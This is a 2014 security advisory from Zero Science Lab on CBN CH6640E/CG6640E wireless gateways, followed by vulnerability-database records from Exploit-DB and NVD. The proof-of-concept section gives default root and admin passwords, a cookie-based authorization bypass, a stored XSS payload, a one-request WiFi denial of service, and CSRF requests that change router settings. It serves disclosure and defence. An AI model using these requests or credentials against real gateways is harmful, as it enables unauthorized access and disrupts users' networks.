CBN CH6640E/CG6640E Wireless Gateway Series Multiple Vulnerabilities
2014-10-25T00:00:00
ID: ZSL-2014-5203 | Type: zeroscience | Reporter: Gjoko Krstic | Modified: 2014-10-25T00:00:00
Description
Title: CBN CH6640E/CG6640E Wireless Gateway Series Multiple Vulnerabilities
Advisory ID: ZSL-2014-5203
Type: Local/Remote
Impact: Security Bypass, Exposure of Sensitive Information, Cross-Site Scripting, DoS
Risk: (3/5)
Release Date: 25.10.2014
Summary
The CBN CH6640E/CG6640E Wireless Gateway is designed for your home, home office, or small business/enterprise. It can be used in households with one or more computers capable of wireless connectivity for remote access to the wireless gateway.
Description
The CBN modem gateway suffers from multiple vulnerabilities, including authorization bypass information disclosure, stored XSS, CSRF and denial of service.
Vendor
Compal Broadband Networks (CBN), Inc. - <http://www.icbn.com.tw>
Affected Version
Model: CH6640 and CH6640E
Hardware version: 1.0
Firmware version: CH6640-3.5.11.7-NOSH
Boot version: PSPU-Boot(BBU) 1.0.19.25m1-CBN01
DOCSIS mode: DOCSIS 3.0
Tested On
Compal Broadband Networks, Inc/Linux/2.6.39.3 UPnP/1.1 MiniUPnPd/1.7
Vendor Status
N/A
PoC
cbn_mv.txt - <http://zeroscience.mk/en/vulnerabilities/../../codes/cbn_mv.txt>
Credits
Vulnerability discovered by Gjoko Krstic - <gjoko@zeroscience.mk>
References
[1] <http://cxsecurity.com/issue/WLB-2014100162>
[2] <http://www.exploit-db.com/exploits/35075/>
[3] <http://osvdb.org/show/osvdb/113836>
[4] <http://osvdb.org/show/osvdb/113837>
[5] <http://osvdb.org/show/osvdb/113838>
[6] <http://osvdb.org/show/osvdb/113839>
[7] <http://osvdb.org/show/osvdb/113840>
[8] <http://osvdb.org/show/osvdb/113841>
[9] <http://osvdb.org/show/osvdb/113842>
[10] <http://osvdb.org/show/osvdb/113843>
[11] <http://packetstormsecurity.com/files/128860>
[12] <http://www.securityfocus.com/bid/70762>
[13] <http://xforce.iss.net/xforce/xfdb/98328>
[14] <http://xforce.iss.net/xforce/xfdb/98329>
[15] <http://cve.mitre.org/cgi-bin/cvename.cgi?name=2014-8653>
[16] <http://cve.mitre.org/cgi-bin/cvename.cgi?name=2014-8654>
[17] <http://cve.mitre.org/cgi-bin/cvename.cgi?name=2014-8655>
[18] <http://cve.mitre.org/cgi-bin/cvename.cgi?name=2014-8656>
[19] <http://cve.mitre.org/cgi-bin/cvename.cgi?name=2014-8657>
[20] <http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-8653>
[21] <http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-8654>
[22] <http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-8655>
[23] <http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-8656>
[24] <http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-8657>
Changelog
[25.10.2014] - Initial release
[28.10.2014] - Added reference [1], [2], [3], [4], [5], [6], [7], [8], [9], [10], [11] and [12]
[30.10.2014] - Added reference [13] and [14]
[07.11.2014] - Added reference [15], [16], [17], [18], [19], [20], [21], [22], [23] and [24]
Contact
Zero Science Lab
Web: <http://www.zeroscience.mk>
e-mail: lab@zeroscience.mk
CVE: CVE-2014-8653, CVE-2014-8656, CVE-2014-8654, CVE-2014-8655, CVE-2014-8657
CVSS: 10.0 (AV:N/AC:L/Au:N/C:C/I:C/A:C)
cbn_mv.txt

CBN CH6640E/CG6640E Wireless Gateway Series Multiple Vulnerabilities


Vendor: Compal Broadband Networks (CBN), Inc.
Product web page: http://www.icbn.com.tw
Affected version: Model: CH6640 and CH6640E
                  Hardware version: 1.0
                  Firmware version: CH6640-3.5.11.7-NOSH
                  Boot version: PSPU-Boot(BBU) 1.0.19.25m1-CBN01
                  DOCSIS mode: DOCSIS 3.0


Summary: The CBN CH6640E/CG6640E Wireless Gateway is designed for your home,
home office, or small business/enterprise. It can be used in households with
one or more computers capable of wireless connectivity for remote access to
the wireless gateway.

Default credentials:

admin/admin - Allow access gateway pages
root/compalbn - Allow access gateway, provisioning pages and provide more
                configuration information.

Desc: The CBN modem gateway suffers from multiple vulnerabilities including
authorization bypass information disclosure, stored XSS, CSRF and denial of
service.

Tested on: Compal Broadband Networks, Inc/Linux/2.6.39.3 UPnP/1.1 MiniUPnPd/1.7


Vulnerabilities discovered by Gjoko 'LiquidWorm' Krstic
                              @zeroscience


Advisory ID: ZSL-2014-5203
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2014-5203.php


04.10.2014

---



Authorization Bypass Information Disclosure Vulnerability
#########################################################

http://192.168.0.1/xml/CmgwWirelessSecurity.xml
http://192.168.0.1/xml/DocsisConfigFile.xml
http://192.168.0.1/xml/CmgwBasicSetup.xml
http://192.168.0.1/basicDDNS.html
http://192.168.0.1/basicLanUsers.html
http://192.168.0.1:5000/rootDesc.xml

Set cookie: userData to root or admin, reveals additional pages/info.

--
<html>
<body>
<script>
document.cookie="userData=root; expires=Thu, 09 Dec 2014 11:05:00 UTC; domain=192.168.0.1; path=/";
</script>
</body>
</html>
--


Denial of Service (DoS) for all WiFi connected clients (disconnect)
###################################################################

GET http://192.168.0.1/wirelessChannelStatus.html HTTP/1.1


Stored Cross-Site Scripting (XSS) Vulnerability
###############################################

Cookie: userData
Value: hax0r"><script>alert(document.cookie);</script>

--
<html>
<body>
<script>
document.cookie="hax0r"><script>alert(document.cookie);</script>; expires=Thu, 09 Dec 2014 11:05:00 UTC; domain=192.168.0.1; path=/";
</script>
</body>
</html>
--


Cross-Site Request Forgery (CSRF) Vulnerability
###############################################

DDNS config:
------------

GET http://192.168.0.1/basicDDNS.html?DdnsService=1&DdnsUserName=a&DdnsPassword=b&DdnsHostName=c# HTTP/1.1


Change wifi pass:
-----------------

GET http://192.168.0.1/setWirelessSecurity.html?Ssid=0&sMode=7&sbMode=1&encAlgm=3&psKey=NEW_PASSWORD&rekeyInt=0 HTTP/1.1


Add static mac address (static assigned dhcp client):
-----------------------------------------------------

GET http://192.168.0.1/setBasicDHCP1.html?action=add_static&MacAddress=38%3A59%3AF9%3AC3%3AE3%3AEF&LeasedIP=8 HTTP/1.1


Enable/Disable UPnP:
--------------------

GET http://192.168.0.1/setAdvancedOptions.html?action=apply&instance=undefined&UPnP=1 HTTP/1.1 (enable)
GET http://192.168.0.1/setAdvancedOptions.html?action=apply&instance=undefined&UPnP=2 HTTP/1.1 (disable)
{"hash": "a569b1601b5fa32eadd5d42648f361fe", "key": "description"}, {"hash": "edc9dc06a2dd9f6e2238c411ac8a6db8", "key": "type"}, {"hash": "11cf593deb5e829cf6e1206da52c8d1c", "key": "title"}, {"hash": "b6ee79178c2cc9c4204defe1a56a2d93", "key": "published"}, {"hash": "75437181f4baf6bf0cf8acd374ea0527", "key": "sourceHref"}], "history": [], "href": "http://zeroscience.mk/en/vulnerabilities/ZSL-2014-5203.php", "id": "ZSL-2014-5203", "lastseen": "2019-10-28T20:32:08", "modified": "2014-10-25T00:00:00", "objectVersion": "1.3", "published": "2014-10-25T00:00:00", "references": [], "reporter": "Gjoko Krstic", "sourceData": "\nCBN CH6640E/CG6640E Wireless Gateway Series Multiple Vulnerabilities\n\n\nVendor: Compal Broadband Networks (CBN), Inc.\nProduct web page: http://www.icbn.com.tw\nAffected version: Model: CH6640 and CH6640E\n Hardware version: 1.0\n Firmware version: CH6640-3.5.11.7-NOSH\n Boot version: PSPU-Boot(BBU) 1.0.19.25m1-CBN01\n DOCSIS mode: DOCSIS 3.0\n\n\nSummary: The CBN CH6640E/CG6640E Wireless Gateway is designed for your home,\nhome office, or small business/enterprise. 
It can be used in households with\none or more computers capable of wireless connectivity for remote access to\nthe wireless gateway.\n\nDefault credentials:\n\nadmin/admin - Allow access gateway pages\nroot/compalbn - Allow access gateway, provisioning pages and provide more\n configuration information.\n\nDesc: The CBN modem gateway suffers from multiple vulnerabilities including\nauthorization bypass information disclosure, stored XSS, CSRF and denial of\nservice.\n\nTested on: Compal Broadband Networks, Inc/Linux/2.6.39.3 UPnP/1.1 MiniUPnPd/1.7\n\n\nVulnerabilities discovered by Gjoko 'LiquidWorm' Krstic\n @zeroscience\n\n\nAdvisory ID: ZSL-2014-5203\nAdvisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2014-5203.php\n\n\n04.10.2014\n\n---\n\n\n\nAuthorization Bypass Information Disclosure Vulnerability\n#########################################################\n\nhttp://192.168.0.1/xml/CmgwWirelessSecurity.xml\nhttp://192.168.0.1/xml/DocsisConfigFile.xml\nhttp://192.168.0.1/xml/CmgwBasicSetup.xml\nhttp://192.168.0.1/basicDDNS.html\nhttp://192.168.0.1/basicLanUsers.html\nhttp://192.168.0.1:5000/rootDesc.xml\n\nSet cookie: userData to root or admin, reveals additional pages/info.\n\n--\n<html>\n<body>\n<script>\ndocument.cookie=\"userData=root; expires=Thu, 09 Dec 2014 11:05:00 UTC; domain=192.168.0.1; path=/\";\n</script>\n</body>\n</html>\n--\n\n\nDenial of Service (DoS) for all WiFi connected clients (disconnect)\n###################################################################\n\nGET http://192.168.0.1/wirelessChannelStatus.html HTTP/1.1\n\n\nStored Cross-Site Scripting (XSS) Vulnerability\n###############################################\n\nCookie: userData\nValue: hax0r\"><script>alert(document.cookie);</script>\n\n--\n<html>\n<body>\n<script>\ndocument.cookie=\"hax0r\"><script>alert(document.cookie);</script>; expires=Thu, 09 Dec 2014 11:05:00 UTC; domain=192.168.0.1; path=/\";\n</script>\n</body>\n</html>\n--\n\n\nCross-Site Request Forgery 
(CSRF) Vulnerability\n###############################################\n\nDDNS config:\n------------\n\nGET http://192.168.0.1/basicDDNS.html?DdnsService=1&DdnsUserName=a&DdnsPassword=b&DdnsHostName=c# HTTP/1.1\n\n\nChange wifi pass:\n-----------------\n\nGET http://192.168.0.1/setWirelessSecurity.html?Ssid=0&sMode=7&sbMode=1&encAlgm=3&psKey=NEW_PASSWORD&rekeyInt=0 HTTP/1.1\n\n\nAdd static mac address (static assigned dhcp client):\n-----------------------------------------------------\n\nGET http://192.168.0.1/setBasicDHCP1.html?action=add_static&MacAddress=38%3A59%3AF9%3AC3%3AE3%3AEF&LeasedIP=8 HTTP/1.1\n\n\nEnable/Disable UPnP:\n--------------------\n\nGET http://192.168.0.1/setAdvancedOptions.html?action=apply&instance=undefined&UPnP=1 HTTP/1.1 (enable)\nGET http://192.168.0.1/setAdvancedOptions.html?action=apply&instance=undefined&UPnP=2 HTTP/1.1 (disable)\n\n", "sourceHref": "http://zeroscience.mk/en/vulnerabilities/../../codes/cbn_mv.txt", "title": "CBN CH6640E/CG6640E Wireless Gateway Series Multiple Vulnerabilities", "type": "zeroscience", "viewCount": 143}, "differentElements": ["sourceData"], "edition": 11, "lastseen": "2019-10-28T20:32:08"}], "edition": 12, "hashmap": [{"key": "bulletinFamily", "hash": "708697c63f7eb369319c6523380bdf7a"}, {"key": "cvelist", "hash": "f66c24acac7472d5f5aeed34d2ef847c"}, {"key": "cvss", "hash": "edfca85c4c320ffaa9dcfdcb6a20ce1d"}, {"key": "description", "hash": "a569b1601b5fa32eadd5d42648f361fe"}, {"key": "href", "hash": "77d58a390a2418f3ec0a57d0cbc9011a"}, {"key": "modified", "hash": "b6ee79178c2cc9c4204defe1a56a2d93"}, {"key": "published", "hash": "b6ee79178c2cc9c4204defe1a56a2d93"}, {"key": "references", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "reporter", "hash": "8ae079da90a361d7a0abdc807f4cd5a2"}, {"key": "sourceData", "hash": "c4e10a83b9354d59ad407d546583fbf4"}, {"key": "sourceHref", "hash": "75437181f4baf6bf0cf8acd374ea0527"}, {"key": "title", "hash": "11cf593deb5e829cf6e1206da52c8d1c"}, {"key": "type", 
"hash": "edc9dc06a2dd9f6e2238c411ac8a6db8"}], "hash": "da5773d28d51cbfce0bb986c7f0fcab128bd405dc996401e0e0ce573a991d1b4", "viewCount": 144, "enchantments": {"dependencies": {"references": [{"type": "exploitdb", "idList": ["EDB-ID:35075"]}, {"type": "cve", "idList": ["CVE-2014-8656", "CVE-2014-8657", "CVE-2014-8654", "CVE-2014-8653", "CVE-2014-8655"]}], "modified": "2019-11-11T16:11:36"}, "score": {"value": 6.8, "vector": "NONE", "modified": "2019-11-11T16:11:36"}, "vulnersScore": 6.8}, "objectVersion": "1.3", "sourceHref": "http://zeroscience.mk/en/vulnerabilities/../../codes/cbn_mv.txt", "sourceData": "<html><head><title>403 Nothing to see.</title>\n<link rel=\"Shortcut Icon\" href=\"favicon.ico\" type=\"image/x-icon\">\n<style type=\"text/css\">\n<!--\nbody {\n\tbackground-color: #000;\n}\nbody,td,th {\n\tfont-family: Verdana, Geneva, sans-serif;\n}\na:link {\n\tcolor: #008FEF;\n\ttext-decoration: none;\n}\na:visited {\n\tcolor: #008FEF;\n\ttext-decoration: none;\n}\na:hover {\n\ttext-decoration: underline;\n\tcolor: #666;\n}\na:active {\n\ttext-decoration: none;\n}\n-->\n</style>\n</head>\n<body bgcolor=black>\n<center>\n<font color=\"#7E88A3\" size=\"2\">\n<br /><br />\n<h1>403 Nothing to see.</h1>\n\nYou do not have the powah for this request /403.shtml<br /><br />\n<font size=\"2\"><a href=\"https://www.zeroscience.mk\">https://www.zeroscience.mk</a></font>\n</font></center>\n</body></html>", "scheme": null}
{"exploitdb": [{"lastseen": "2016-02-04T00:33:17", "bulletinFamily": "exploit", "description": "CBN CH6640E/CG6640E Wireless Gateway Series Multiple Vulnerabilities. CVE-2014-8655,CVE-2014-8657. Webapps exploit for hardware platform", "modified": "2014-10-27T00:00:00", "published": "2014-10-27T00:00:00", "id": "EDB-ID:35075", "href": "https://www.exploit-db.com/exploits/35075/", "type": "exploitdb", "title": "CBN CH6640E/CG6640E Wireless Gateway Series Multiple Vulnerabilities", "sourceData": "\r\nCBN CH6640E/CG6640E Wireless Gateway Series Multiple Vulnerabilities\r\n\r\n\r\nVendor: Compal Broadband Networks (CBN), Inc.\r\nProduct web page: http://www.icbn.com.tw\r\nAffected version: Model: CH6640 and CH6640E\r\n Hardware version: 1.0\r\n Firmware version: CH6640-3.5.11.7-NOSH\r\n Boot version: PSPU-Boot(BBU) 1.0.19.25m1-CBN01\r\n DOCSIS mode: DOCSIS 3.0\r\n\r\n\r\nSummary: The CBN CH6640E/CG6640E Wireless Gateway is designed for your home,\r\nhome office, or small business/enterprise. 
It can be used in households with\r\none or more computers capable of wireless connectivity for remote access to\r\nthe wireless gateway.\r\n\r\nDefault credentials:\r\n\r\nadmin/admin - Allow access gateway pages\r\nroot/compalbn - Allow access gateway, provisioning pages and provide more\r\n configuration information.\r\n\r\nDesc: The CBN modem gateway suffers from multiple vulnerabilities including\r\nauthorization bypass information disclosure, stored XSS, CSRF and denial of\r\nservice.\r\n\r\nTested on: Compal Broadband Networks, Inc/Linux/2.6.39.3 UPnP/1.1 MiniUPnPd/1.7\r\n\r\n\r\nVulnerabilities discovered by Gjoko 'LiquidWorm' Krstic\r\n @zeroscience\r\n\r\n\r\nAdvisory ID: ZSL-2014-5203\r\nAdvisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2014-5203.php\r\n\r\n\r\n04.10.2014\r\n\r\n---\r\n\r\n\r\n\r\nAuthorization Bypass Information Disclosure Vulnerability\r\n#########################################################\r\n\r\nhttp://192.168.0.1/xml/CmgwWirelessSecurity.xml\r\nhttp://192.168.0.1/xml/DocsisConfigFile.xml\r\nhttp://192.168.0.1/xml/CmgwBasicSetup.xml\r\nhttp://192.168.0.1/basicDDNS.html\r\nhttp://192.168.0.1/basicLanUsers.html\r\nhttp://192.168.0.1:5000/rootDesc.xml\r\n\r\nSet cookie: userData to root or admin, reveals additional pages/info.\r\n\r\n--\r\n<html>\r\n<body>\r\n<script>\r\ndocument.cookie=\"userData=root; expires=Thu, 09 Dec 2014 11:05:00 UTC; domain=192.168.0.1; path=/\";\r\n</script>\r\n</body>\r\n</html>\r\n--\r\n\r\n\r\nDenial of Service (DoS) for all WiFi connected clients (disconnect)\r\n###################################################################\r\n\r\nGET http://192.168.0.1/wirelessChannelStatus.html HTTP/1.1\r\n\r\n\r\nStored Cross-Site Scripting (XSS) Vulnerability\r\n###############################################\r\n\r\nCookie: userData\r\nValue: 
hax0r\"><script>alert(document.cookie);</script>\r\n\r\n--\r\n<html>\r\n<body>\r\n<script>\r\ndocument.cookie=\"hax0r\"><script>alert(document.cookie);</script>; expires=Thu, 09 Dec 2014 11:05:00 UTC; domain=192.168.0.1; path=/\";\r\n</script>\r\n</body>\r\n</html>\r\n--\r\n\r\n\r\nCross-Site Request Forgery (CSRF) Vulnerability\r\n###############################################\r\n\r\nDDNS config:\r\n------------\r\n\r\nGET http://192.168.0.1/basicDDNS.html?DdnsService=1&DdnsUserName=a&DdnsPassword=b&DdnsHostName=c# HTTP/1.1\r\n\r\n\r\nChange wifi pass:\r\n-----------------\r\n\r\nGET http://192.168.0.1/setWirelessSecurity.html?Ssid=0&sMode=7&sbMode=1&encAlgm=3&psKey=NEW_PASSWORD&rekeyInt=0 HTTP/1.1\r\n\r\n\r\nAdd static mac address (static assigned dhcp client):\r\n-----------------------------------------------------\r\n\r\nGET http://192.168.0.1/setBasicDHCP1.html?action=add_static&MacAddress=38%3A59%3AF9%3AC3%3AE3%3AEF&LeasedIP=8 HTTP/1.1\r\n\r\n\r\nEnable/Disable UPnP:\r\n--------------------\r\n\r\nGET http://192.168.0.1/setAdvancedOptions.html?action=apply&instance=undefined&UPnP=1 HTTP/1.1 (enable)\r\nGET http://192.168.0.1/setAdvancedOptions.html?action=apply&instance=undefined&UPnP=2 HTTP/1.1 (disable)\r\n\r\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/35075/"}], "cve": [{"lastseen": "2019-05-29T18:13:49", "bulletinFamily": "NVD", "description": "The Compal Broadband Networks (CBN) CH6640E and CG6640E Wireless Gateway 1.0 with firmware CH6640-3.5.11.7-NOSH have a default password of (1) admin for the admin account and (2) compalbn for the root account, which makes it easier for remote attackers to obtain access to certain sensitive information via unspecified vectors.", "modified": "2014-11-06T19:20:00", "id": "CVE-2014-8656", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-8656", "published": "2014-11-06T15:55:00", "title": 
"CVE-2014-8656", "type": "cve", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:13:49", "bulletinFamily": "NVD", "description": "Multiple cross-site request forgery (CSRF) vulnerabilities in Compal Broadband Networks (CBN) CH6640E and CG6640E Wireless Gateway hardware 1.0 with firmware CH6640-3.5.11.7-NOSH allow remote attackers to hijack the authentication of administrators for requests that (1) have unspecified impact on DDNS configuration via a request to basicDDNS.html, (2) change the wifi password via the psKey parameter to setWirelessSecurity.html, (3) add a static MAC address via the MacAddress parameter in an add_static action to setBasicDHCP1.html, or (4) enable or disable UPnP via the UPnP parameter in an apply action to setAdvancedOptions.html.", "modified": "2017-09-08T01:29:00", "id": "CVE-2014-8654", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-8654", "published": "2014-11-06T15:55:00", "title": "CVE-2014-8654", "type": "cve", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:13:49", "bulletinFamily": "NVD", "description": "The Compal Broadband Networks (CBN) CH6640E and CG6640E Wireless Gateway 1.0 with firmware CH6640-3.5.11.7-NOSH allows remote attackers to cause a denial of service (disconnect all wifi clients) via a request to wirelessChannelStatus.html.", "modified": "2017-09-08T01:29:00", "id": "CVE-2014-8657", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-8657", "published": "2014-11-06T15:55:00", "title": "CVE-2014-8657", "type": "cve", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2019-05-29T18:13:49", "bulletinFamily": "NVD", "description": "Cross-site scripting (XSS) vulnerability in Compal Broadband Networks (CBN) CH6640E and CG6640E Wireless Gateway 1.0 with firmware CH6640-3.5.11.7-NOSH allows remote attackers to inject arbitrary web script or HTML via the userData cookie.", 
"modified": "2017-09-08T01:29:00", "id": "CVE-2014-8653", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-8653", "published": "2014-11-06T15:55:00", "title": "CVE-2014-8653", "type": "cve", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2019-05-29T18:13:49", "bulletinFamily": "NVD", "description": "The Compal Broadband Networks (CBN) CH6640E and CG6640E Wireless Gateway 1.0 with firmware CH6640-3.5.11.7-NOSH allows remote attackers to bypass authentication and obtain sensitive information via an (a) admin or a (b) root value in the userData cookie in a request to (1) CmgwWirelessSecurity.xml, (2) DocsisConfigFile.xml, or (3) CmgwBasicSetup.xml in xml/ or (4) basicDDNS.html, (5) basicLanUsers.html, or (6) rootDesc.xml.", "modified": "2017-09-08T01:29:00", "id": "CVE-2014-8655", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-8655", "published": "2014-11-06T15:55:00", "title": "CVE-2014-8655", "type": "cve", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}]}